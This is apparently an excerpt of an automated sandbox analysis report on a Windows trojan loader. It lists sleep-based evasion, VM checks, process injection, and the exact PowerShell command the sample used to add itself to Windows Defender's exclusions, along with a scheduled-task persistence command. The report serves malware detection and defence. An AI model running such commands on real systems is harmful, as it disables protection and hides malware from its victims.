                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -238859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -238750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -238640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -238531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -238421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -238312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -238203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -238093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -237984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -237875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -237765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -237656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -237546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -237436s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -237328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -237218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -237088s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -236968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -236817s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -236568s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -236453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -236302s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -236186s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -236065s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -235943s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856Thread sleep time: -235812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 2744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 416Thread sleep count: 9086 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5480Thread sleep count: 353 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 2524Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -239828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -239715s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -239609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -239500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -239391s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -239264s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -239156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -239047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -238937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -238828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -238719s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -238609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -238500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -238391s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -238025s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -237907s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -237782s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -237657s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -237532s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -237407s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -237295s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -237188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -237063s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -236938s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -236766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -236579s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -236438s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 4344Thread sleep time: -236313s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 3420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe TID: 5972Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239874Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239764Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239654Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239546Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239437Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239328Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239218Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 239080Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238968Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238859Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238750Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238640Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238531Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238421Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238312Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238203Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 238093Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237984Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237875Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237765Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237656Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237546Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237436Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237328Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237218Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 237088Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236968Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236817Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236568Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236453Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236302Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236186Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 236065Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 235943Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 235812Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239715Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239391Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239264Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 239047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238391Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 238025Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237782Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237657Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237407Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237295Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 237063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 236313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeThread delayed: delay time: 922337203685477
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4641371042.0000000006AC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAO,
                    Source: xNgpESfQOvfb.exe, 0000000A.00000002.2267710024.00000000078EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMemory written: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
